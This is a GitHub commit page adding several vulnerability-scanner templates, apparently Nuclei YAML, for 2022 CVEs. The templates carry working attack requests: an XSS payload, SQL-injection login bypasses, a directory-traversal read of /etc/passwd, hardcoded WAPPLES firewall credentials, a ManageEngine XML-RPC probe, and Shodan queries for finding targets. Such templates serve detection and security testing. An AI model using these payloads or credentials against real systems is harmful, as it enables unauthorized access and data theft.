-
Notifications
You must be signed in to change notification settings - Fork 653
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
26 changed files
with
892 additions
and
32 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,45 @@ | ||
| id: CVE-2022-0678 | ||
|
|
||
| info: | ||
| name: Microweber < 1.2.11- Cross-Site Scripting | ||
| author: tess | ||
| severity: medium | ||
| description: | | ||
| Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out. | ||
| reference: | ||
| - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/ | ||
| - https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-0678 | ||
| - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
| cvss-score: 6.1 | ||
| cve-id: CVE-2022-0678 | ||
| cwe-id: CWE-79 | ||
| metadata: | ||
| shodan-query: http.favicon.hash:780351152 | ||
| verified: "true" | ||
| tags: huntr,cve,cve2022,xss,microweber | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - '{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - '><script>alert(document.domain)</script>' | ||
| - 'content="Microweber"' | ||
| condition: and | ||
|
|
||
| - type: word | ||
| part: header | ||
| words: | ||
| - text/html | ||
|
|
||
| - type: status | ||
| status: | ||
| - 404 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,46 @@ | ||
| id: CVE-2022-29775 | ||
|
|
||
| info: | ||
| name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication | ||
| author: arafatansari | ||
| severity: critical | ||
| description: | | ||
| iSpyConnect iSpy v7.2.2.0 allows attackers to bypass authentication via a crafted URL. | ||
| reference: | ||
| - https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b | ||
| - https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-29775 | ||
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
| cvss-score: 9.8 | ||
| cve-id: CVE-2022-29775 | ||
| cwe-id: CWE-287 | ||
| metadata: | ||
| shodan-query: http.html:"iSpy is running" | ||
| verified: "true" | ||
| tags: cve,cve2022,ispy,auth-bypass | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - '{{BaseURL}}/logfile?d=crossdomain.xml' | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - 'Log Start' | ||
| - 'Log File' | ||
| - 'iSpy' | ||
| condition: and | ||
|
|
||
| - type: word | ||
| part: header | ||
| words: | ||
| - text/html | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,45 @@ | ||
| id: CVE-2022-32094 | ||
|
|
||
| info: | ||
| name: Hospital Management System v1.0 - SQL Injection | ||
| author: arafatansari | ||
| severity: critical | ||
| description: | | ||
| Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. | ||
| reference: | ||
| - https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/ | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-32094 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
| cvss-score: 9.8 | ||
| cve-id: CVE-2022-32094 | ||
| cwe-id: CWE-89 | ||
| metadata: | ||
| shodan-query: http.html:"Hospital Management System" | ||
| verified: "true" | ||
| tags: cve,cve2022,hms,cms,sqli,auth-bypass | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /hms/doctor/ HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit= | ||
| redirects: true | ||
| max-redirects: 2 | ||
| cookie-reuse: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - '<title>Doctor | Dashboard</title>' | ||
| - 'View Appointment History' | ||
| condition: and | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,46 @@ | ||
| id: CVE-2022-34590 | ||
|
|
||
| info: | ||
| name: Hospital Management System v1.0 - SQL Injection | ||
| author: arafatansari | ||
| severity: high | ||
| description: | | ||
| Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/admin.php. | ||
| reference: | ||
| - https://github.com/Renrao/bug_report/blob/master/blob/main/vendors/itsourcecode.com/hospital-management-system/sql_injection.md | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-34590 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H | ||
| cvss-score: 7.2 | ||
| cve-id: CVE-2022-34590 | ||
| cwe-id: CWE-89 | ||
| metadata: | ||
| shodan-query: http.html:"Hospital Management System" | ||
| verified: "true" | ||
| tags: cve,cve2022,hms,cms,sqli | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /hms/admin/ HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit= | ||
| redirects: true | ||
| max-redirects: 2 | ||
| cookie-reuse: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - '<title>Admin | Dashboard</title>' | ||
| - 'Manage Patients' | ||
| - 'Manage Doctors' | ||
| condition: and | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,58 +1,54 @@ | ||
| id: CVE-2022-35405 | ||
|
|
||
| info: | ||
| name: Zoho ManageEngine Password Manager Pro - Unauthenticated Remote Command Execution | ||
| author: true13 | ||
| name: Zoho ManageEngine Password Manager Pro and PAM 360 - Unauthenticated Remote Command Execution | ||
| author: viniciuspereiras,true13 | ||
| severity: critical | ||
| description: | | ||
| This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro. | ||
| This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro, PAM360 and Access Manager Plus (Authenticated). | ||
| reference: | ||
| - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb | ||
| - https://xz.aliyun.com/t/11578 | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-35405 | ||
| - https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html | ||
| - https://www.bigous.me/2022/09/06/CVE-2022-35405.html | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
| cvss-score: 9.8 | ||
| cve-id: CVE-2022-35405 | ||
| metadata: | ||
| shodan-query: http.title:"ManageEngine Password" | ||
| shodan-query: http.title:"ManageEngine" | ||
| tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /xmlrpc HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Type: text/xml | ||
| <?xml version="1.0"?> | ||
| <methodCall> | ||
| <methodName>ProjectDiscovery</methodName> | ||
| <params> | ||
| <param> | ||
| <value> | ||
| <struct> | ||
| <member> | ||
| <name>test</name> | ||
| <value> | ||
| <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable> | ||
| </value> | ||
| </member> | ||
| </struct> | ||
| </value> | ||
| </param> | ||
| </params> | ||
| </methodCall> | ||
| matchers-condition: and | ||
| <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall> | ||
| - | | ||
| POST /xmlrpc HTTP/1.1 | ||
| Host: {{Host}}:7272 | ||
| <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall> | ||
| - | | ||
| POST /xmlrpc HTTP/1.1 | ||
| Host: {{Host}}:8282 | ||
| <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall> | ||
| - | | ||
| POST /xmlrpc HTTP/1.1 | ||
| Host: {{Host}}:9292 | ||
| <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall> | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - "Failed to read result object: null" | ||
|
|
||
| - type: word | ||
| part: header | ||
| words: | ||
| - text/xml | ||
| - "faultString" | ||
| - "No such service [ProjectDiscovery]" | ||
| - "methodResponse" | ||
| condition: or |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,50 @@ | ||
| id: CVE-2022-35413 | ||
|
|
||
| info: | ||
| name: Wapples Web Application Firewall - Hardcoded credentials | ||
| author: For3stCo1d | ||
| severity: critical | ||
| description: | | ||
| WAPPLES through 6.0 has a hardcoded systemi account accessible via db/wp.no1 (as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file). A threat actor could use this account to access the system configuration and confidential information (such as SSL keys) via an HTTPS request to the /webapi/ URI on port 443 or 5001. | ||
| reference: | ||
| - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb | ||
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413 | ||
| - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview | ||
| metadata: | ||
| shodan-query: http.title:"Intelligent WAPPLES" | ||
| verified: "true" | ||
| tags: cve,cve2022,wapples,firewall,default-login | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /webapi/auth HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| id={{username}}&password={{password}} | ||
| attack: pitchfork | ||
| payloads: | ||
| username: | ||
| - systemi | ||
| password: | ||
| - db/wp.no1 | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - '"res_msg":"Authentication Success."' | ||
| - '"doc_id":"user_systemi"' | ||
| condition: and | ||
|
|
||
| - type: word | ||
| part: header | ||
| words: | ||
| - WP_SESSID= | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,43 @@ | ||
| id: CVE-2022-38637 | ||
|
|
||
| info: | ||
| name: Hospital Management System v1.0 - SQL Injection | ||
| author: arafatansari | ||
| severity: high | ||
| description: | | ||
| Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. | ||
| reference: | ||
| - https://www.youtube.com/watch?v=m8nW0p69UHU | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-38637 | ||
| - https://owasp.org/www-community/attacks/SQL_Injection | ||
| classification: | ||
| cve-id: CVE-2022-38637 | ||
| metadata: | ||
| shodan-query: http.html:"Hospital Management System" | ||
| verified: "true" | ||
| tags: cve,cve2022,hms,cms,sqli,auth-bypass | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /hms/user-login.php HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit= | ||
| redirects: true | ||
| max-redirects: 2 | ||
| cookie-reuse: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - '<title>User | Dashboard</title>' | ||
| - 'Book My Appointment' | ||
| condition: and | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,29 @@ | ||
| id: CVE-2022-40734 | ||
|
|
||
| info: | ||
| name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal | ||
| author: arafatansari | ||
| severity: high | ||
| description: | | ||
| UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files. | ||
| reference: | ||
| - https://github.com/UniSharp/laravel-filemanager/issues/1150 | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-40734 | ||
| classification: | ||
| cve-id: CVE-2022-40734 | ||
| metadata: | ||
| verified: true | ||
| shodan-query: http.html:"Laravel Filemanager" | ||
| tags: cve,cve2022,laravel,unisharp,lfi,traversal | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd" | ||
| - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd" | ||
|
|
||
| stop-at-first-match: true | ||
| matchers: | ||
| - type: regex | ||
| regex: | ||
| - "root:[x*]:0:0" |
Oops, something went wrong.